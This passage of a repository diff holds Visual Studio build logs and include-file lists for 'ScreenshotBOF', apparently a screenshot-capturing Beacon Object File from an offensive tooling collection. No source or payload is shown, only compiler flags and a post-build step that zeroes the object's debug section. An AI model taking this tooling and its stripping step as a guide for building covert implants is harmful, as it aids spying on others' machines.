61	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\SYSINFOAPI.H
62	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\MEMORYAPI.H
63	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\ENCLAVEAPI.H
64	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\THREADPOOLLEGACYAPISET.H
65	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\THREADPOOLAPISET.H
66	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\JOBAPI.H
67	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\JOBAPI2.H
68	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WOW64APISET.H
69	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\LIBLOADERAPI.H
70	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\SECURITYBASEAPI.H
71	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\NAMESPACEAPI.H
72	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\SYSTEMTOPOLOGYAPI.H
73	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\PROCESSTOPOLOGYAPI.H
74	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\SECURITYAPPCONTAINER.H
75	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\REALTIMEAPISET.H
76	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\WINERROR.H
77	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\TIMEZONEAPI.H
78	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINGDI.H
79	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINUSER.H
80	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\TVOUT.H
81	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINNLS.H
82	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\DATETIMEAPI.H
83	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\STRINGAPISET.H
84	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINCON.H
85	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINCONTYPES.H
86	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\CONSOLEAPI.H
87	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\CONSOLEAPI2.H
88	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\CONSOLEAPI3.H
89	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINVER.H
90	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\VERRSRC.H
91	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINREG.H
92	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\REASON.H
93	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINNETWK.H
94	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\WNNC.H
95	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\CDERR.H
96	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\DDE.H
97	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\DDEML.H
98	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\DLGS.H
99	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\LZEXPAND.H
100	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\MMSYSTEM.H
101	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\MMSYSCOM.H
102	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\MCIAPI.H
103	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\MMISCAPI.H
104	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\MMISCAPI2.H
105	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\PLAYSOUNDAPI.H
106	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\MMEAPI.H
107	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\TIMEAPI.H
108	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\JOYSTICKAPI.H
109	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\NB30.H
110	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\RPC.H
111	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\RPCDCE.H
112	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\RPCDCEP.H
113	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\RPCNSI.H
114	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\RPCNTERR.H
115	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\RPCASYNC.H
116	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\SHELLAPI.H
117	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINPERF.H
118	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINSOCK.H
119	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\INADDR.H
120	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINCRYPT.H
121	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\BCRYPT.H
122	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\NCRYPT.H
123	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\DPAPI.H
124	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINEFS.H
125	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINSCARD.H
126	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\WTYPES.H
127	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\RPCNDR.H
128	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\RPCNSIP.H
129	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\RPCSAL.H
130	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\WTYPESBASE.H
131	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINIOCTL.H
132	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\WINSMCRD.H
133	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINSPOOL.H
134	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\PRSHT.H
135	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\OLE2.H
136	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\OBJBASE.H
137	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\COMBASEAPI.H
138	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\STDLIB.H
139	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\CORECRT_MALLOC.H
140	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\CORECRT_SEARCH.H
141	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\STDDEF.H
142	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\CORECRT_WSTDLIB.H
143	+	C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\COMMUNITY\VC\TOOLS\MSVC\14.27.29110\INCLUDE\LIMITS.H
144	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\UNKNWNBASE.H
145	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\OBJIDLBASE.H
146	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\CGUID.H
147	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\COML2API.H
148	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\OBJIDL.H
149	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\UNKNWN.H
150	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\PROPIDLBASE.H
151	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\OAIDL.H
152	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\URLMON.H
153	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\OLEIDL.H
154	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\SERVPROV.H
155	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\MSXML.H
156	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\PROPIDL.H
157	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\OLEAUTO.H
158	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\COMMDLG.H
159	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\STRALIGN.H
160	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINSVC.H
161	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\MCX.H
162	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\IMM.H
163	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\IME_CMODES.H
164	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\STDIO.H
165	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\CORECRT_WSTDIO.H
166	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\CORECRT_STDIO_CONFIG.H
167	+	C:\USERS\ETHAN\DOWNLOADS\AVEXCEPTION\CODEX_ARSENAL\PUBLIC\SCREENSHOT_BOF\SCREENSHOTBOF\SCREENSHOTBOF\BOFDEFS.H
168	+	C:\USERS\ETHAN\DOWNLOADS\AVEXCEPTION\CODEX_ARSENAL\PUBLIC\SCREENSHOT_BOF\SCREENSHOTBOF\SCREENSHOTBOF\BEACON.H
169	+

■ ■ ■ ■ ■ ■

ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.write.1.tlog

1	+	^C:\USERS\ETHAN\DOWNLOADS\AVEXCEPTION\CODEX_ARSENAL\PUBLIC\SCREENSHOT_BOF\SCREENSHOTBOF\SCREENSHOTBOF\SOURCE.CPP
2	+	C:\USERS\ETHAN\DOWNLOADS\AVEXCEPTION\CODEX_ARSENAL\PUBLIC\SCREENSHOT_BOF\SCREENSHOTBOF\SCREENSHOTBOF\INTERMEDIARY\BOF\X64\SOURCE.OBJ
3	+

■ ■ ■ ■ ■ ■

ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate

1	+	PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.27.29110:TargetPlatformVersion=10.0.18362.0:
2	+	BOF\|x64\|C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\\|
3	+

■ ■ ■ ■ ■ ■

ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.vcxproj.FileListAbsolute.txt

1

+

■ ■ ■ ■ ■ ■

ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.Build.CppClean.log

1	+	c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\source.obj
2	+	c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\bin\bof\screenshotbof.x64.obj
3	+	c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.command.1.tlog
4	+	c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.read.1.tlog
5	+	c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.write.1.tlog
6	+

■ ■ ■ ■ ■ ■

ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.recipe

1	+	<?xml version="1.0" encoding="utf-8"?>
2	+	<Project>
3	+	<ProjectOutputs>C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\bin\BOF\ScreenshotBOFx64</ProjectOutputs>
4	+	<ContentFiles></ContentFiles>
5	+	<SatelliteDlls></SatelliteDlls>
6	+	<NonRecipeFileRefs></NonRecipeFileRefs>
7	+	</Project>

ScreenshotBOF/intermediary/BOF/x64/source.obj

Binary file.

■ ■ ■ ■ ■ ■

ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.log

1	+	Microsoft (R) C/C++ Optimizing Compiler Version 19.27.29111 for x86
2	+	Copyright (C) Microsoft Corporation. All rights reserved.
3	+
4	+	cl /c /Oy- /D BOF /GS- /Fo"intermediary\BOF\x86\\" /TP /analyze- /c /Fo"intermediary\BOF\x86\source" Source.cpp
5	+	cl : Command line warning D9025: overriding '/Fointermediary\BOF\x86\' with '/Fointermediary\BOF\x86\source'
6	+
7	+	Source.cpp
8	+	C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(93): warning C4141: 'dllimport': used more than once
9	+	C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(96): warning C4141: 'dllimport': used more than once
10	+	C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(99): warning C4141: 'dllimport': used more than once
11	+	C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(102): warning C4141: 'dllimport': used more than once
12	+	C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(105): warning C4141: 'dllimport': used more than once
13	+	C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once
14	+	C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once
15	+	C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once
16	+	C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(246): warning C4005: 'ZeroMemory': macro redefinition
17	+	C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory'
18	+	C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x86\source.obj
19	+	1 File(s) copied
20	+	enumerating sections...
21	+	found debug section.. zeroing it...
22	+	closing stream...
23	+	done!
24	+

■ ■ ■ ■ ■ ■

ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.command.1.tlog

1	+	^C:\USERS\ETHAN\DOWNLOADS\AVEXCEPTION\CODEX_ARSENAL\PUBLIC\SCREENSHOT_BOF\SCREENSHOTBOF\SCREENSHOTBOF\SOURCE.CPP
2	+	/c /Oy- /D BOF /GS- /Fo"INTERMEDIARY\BOF\X86\\" /TP /analyze- /c /Fo"intermediary\BOF\x86\source" C:\USERS\ETHAN\DOWNLOADS\AVEXCEPTION\CODEX_ARSENAL\PUBLIC\SCREENSHOT_BOF\SCREENSHOTBOF\SCREENSHOTBOF\SOURCE.CPP
3	+

■ ■ ■ ■ ■ ■

ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.read.1.tlog

1	+	^C:\USERS\ETHAN\DOWNLOADS\AVEXCEPTION\CODEX_ARSENAL\PUBLIC\SCREENSHOT_BOF\SCREENSHOTBOF\SCREENSHOTBOF\SOURCE.CPP
2	+	C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
3	+	C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\COMMUNITY\VC\TOOLS\MSVC\14.27.29110\BIN\HOSTX86\X86\1033\CLUI.DLL
4	+	C:\WINDOWS\SYSTEM32\TZRES.DLL
5	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINDOWS.H
6	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\WINAPIFAMILY.H
7	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\WINPACKAGEFAMILY.H
8	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\SDKDDKVER.H
9	+	C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\COMMUNITY\VC\TOOLS\MSVC\14.27.29110\INCLUDE\EXCPT.H
10	+	C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\COMMUNITY\VC\TOOLS\MSVC\14.27.29110\INCLUDE\VCRUNTIME.H
11	+	C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\COMMUNITY\VC\TOOLS\MSVC\14.27.29110\INCLUDE\SAL.H
12	+	C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\COMMUNITY\VC\TOOLS\MSVC\14.27.29110\INCLUDE\CONCURRENCYSAL.H
13	+	C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\COMMUNITY\VC\TOOLS\MSVC\14.27.29110\INCLUDE\VADEFS.H
14	+	C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\COMMUNITY\VC\TOOLS\MSVC\14.27.29110\INCLUDE\STDARG.H
15	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\WINDEF.H
16	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\MINWINDEF.H
17	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\SPECSTRINGS.H
18	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\SPECSTRINGS_STRICT.H
19	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\SPECSTRINGS_UNDEF.H
20	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\DRIVERSPECS.H
21	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\SDV_DRIVERSPECS.H
22	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINNT.H
23	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\CTYPE.H
24	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\CORECRT.H
25	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\CORECRT_WCTYPE.H
26	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\KERNELSPECS.H
27	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\BASETSD.H
28	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\GUIDDEF.H
29	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\STRING.H
30	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\CORECRT_MEMORY.H
31	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\CORECRT_MEMCPY_S.H
32	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\ERRNO.H
33	+	C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\COMMUNITY\VC\TOOLS\MSVC\14.27.29110\INCLUDE\VCRUNTIME_STRING.H
34	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\CORECRT_WSTRING.H
35	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\PSHPACK4.H
36	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\POPPACK.H
37	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\PSHPACK2.H
38	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\PSHPACK8.H
39	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\PSHPACK1.H
40	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\APISET.H
41	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\KTMTYPES.H
42	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINBASE.H
43	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\APISETCCONV.H
44	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\MINWINBASE.H
45	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\APIQUERY2.H
46	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\PROCESSENV.H
47	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\FILEAPIFROMAPP.H
48	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\FILEAPI.H
49	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\DEBUGAPI.H
50	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\UTILAPISET.H
51	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\HANDLEAPI.H
52	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\ERRHANDLINGAPI.H
53	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\FIBERSAPI.H
54	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\NAMEDPIPEAPI.H
55	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\PROFILEAPI.H
56	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\HEAPAPI.H
57	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\IOAPISET.H
58	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\SYNCHAPI.H
59	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\INTERLOCKEDAPI.H
60	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\PROCESSTHREADSAPI.H
61	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\SYSINFOAPI.H
62	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\MEMORYAPI.H
63	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\ENCLAVEAPI.H
64	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\THREADPOOLLEGACYAPISET.H
65	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\THREADPOOLAPISET.H
66	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\JOBAPI.H
67	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\JOBAPI2.H
68	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WOW64APISET.H
69	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\LIBLOADERAPI.H
70	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\SECURITYBASEAPI.H
71	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\NAMESPACEAPI.H
72	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\SYSTEMTOPOLOGYAPI.H
73	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\PROCESSTOPOLOGYAPI.H
74	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\SECURITYAPPCONTAINER.H
75	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\REALTIMEAPISET.H
